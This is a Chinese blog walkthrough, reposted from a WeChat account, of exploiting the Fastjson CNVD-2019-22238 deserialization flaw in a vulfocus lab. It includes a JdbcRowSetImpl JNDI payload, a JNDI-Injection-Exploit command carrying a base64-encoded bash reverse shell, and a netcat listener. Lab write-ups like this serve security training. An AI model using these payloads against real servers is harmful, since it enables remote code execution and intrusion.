Fastjson-CNVD_2019_22238漏洞利用

admin 2022年3月30日20:15:29评论407 views字数 751阅读2分30秒阅读模式

漏洞环境:vulfocus Fastjson-CNVD_2019_22238


影响版本:fastjson <1.2.48


拿到一个网站,先进行抓包测试,渗透千万不要在网页上做!

Fastjson-CNVD_2019_22238漏洞利用


向这个地址POST一个JSON对象,就可以更新服务端信息,我这里用用单括号报错判断是否存在漏洞 500错误(已知这里存在该漏洞可以省去单括号判断)

Fastjson-CNVD_2019_22238漏洞利用


这里的命令是下面这个,注意把IP换成自己的,bash命令里面的IP也换成自己的,可以用我第一个文章的工具一键转码

JNDIExploit自行在GitHub上面下载,一大堆

java8 -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 攻击IP -C "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzAuMC4wLjAvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"


Fastjson-CNVD_2019_22238漏洞利用


使用payload尝试(这里注意的是fastjson每个版本的payload都不一样,如果自己的版本和我不一样,请自行在GitHub上面下载其他版本的payload)

{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}


Fastjson-CNVD_2019_22238漏洞利用


弹shell的那台机器记得监听端口

nc -lvvp 端口


发送请求!


Fastjson-CNVD_2019_22238漏洞利用


成功反弹shell到攻击机上,找到了flag!


这里补充一个知识点,如果你在服务器搭建的靶场,注意用有公网IP的vps接shell,你的windows主机接不到哦!


原文始发于微信公众号(SUMMER渗透学习):Fastjson-CNVD_2019_22238漏洞利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日20:15:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fastjson-CNVD_2019_22238漏洞利用https://cn-sec.com/archives/853925.html

发表评论

匿名网友 填写信息